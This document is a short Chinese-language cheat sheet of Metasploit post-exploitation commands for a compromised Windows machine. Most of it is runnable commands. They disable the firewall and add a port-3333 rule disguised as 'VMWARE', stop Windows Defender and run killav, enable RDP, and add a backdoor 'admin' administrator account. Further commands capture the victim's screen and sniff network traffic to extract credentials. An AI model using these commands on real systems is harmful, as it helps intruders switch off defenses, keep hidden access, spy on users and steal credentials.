1. msf通过shell关闭防火墙
Netsh advfirewall set allprofiles state off(关闭防火墙)
Netsh advfirewall show allprofiles (查看防火墙状况)
通过策略添加防火墙规则规避行为(设置某个端口的行为不被防火墙所约束,相当于加入白名单)
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=3333 action=allow
netsh firewall add portopening TCP 3333 "VMWARE" ENABLE ALL
重启生效
shutdown -r -f -t 0
-f:强制重启
-t :时间为0,立即重启
2、关闭杀毒软件
关闭windefend:
net stop windefend
关闭杀毒软件(msf自带的两个模块)
run killav
run post/windows/manage/killav
(其实没什么用,windows的杀软一般不能通过这种方式关闭)
3、打开并连接3389
通过MSF里面的自带模块可以打开3389的端口
run post/windows/manage/enable_rdp
run getgui -e
可以利用MSF模块命令,在目标机器上添加用户:
run getgui -u admin -p admin
-u:用户名
-p:密码(注意windows服务器有密码强度的规范)
将添加的用户添加到用户组:
net localgroup administrators admin /add
远程桌面连接
在windows中:mstsc——>打开远程桌面连接
在linux中:rdesktop——>redesktop -u username -p password ip
查看远程桌面:
use espia
screenshot
screengrab
screenshare
删除指定账号:
Run post/windows/manage/delete_user USERNAME=admin
4. 数据包抓取
抓包:
Load sniffer
Sniffer_interface
Sniffer_start 2
Sniffer_dump 2 1.cap
解码
Use auxillary/sniffer/psnuffle
Set PCAPFILE 1.cap
Exploit